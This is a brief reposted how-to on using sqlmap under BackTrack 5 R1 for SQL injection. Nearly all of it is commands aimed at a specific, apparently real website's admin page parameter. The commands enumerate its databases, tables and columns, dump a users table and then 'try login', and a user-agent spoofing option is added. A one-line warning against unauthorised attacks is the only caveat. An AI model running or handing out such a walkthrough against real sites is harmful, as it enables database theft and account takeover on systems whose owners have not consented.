HOWTO : SQL Injection with SQLmap on Back|Track 5 R1

*** Do NOT attack any computer or network without authorization or you may put into jail. ***



Credit to :ruo911



This is ruo911's work but not mine. I re-post it for educational purpose only.







Command



cd /pentest/web/scanners/sqlmap

python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 --dbs

python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -D pjirc_forum --tables

python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users --columns

python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users -U test --dump




try login.



p.s

1. Backtrack 5 R1 - sqlmap

cd /pentest/database/sqlmap



2. user agent options

example)

--user-agent="Mozilla/5.0 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"



That's all! See you.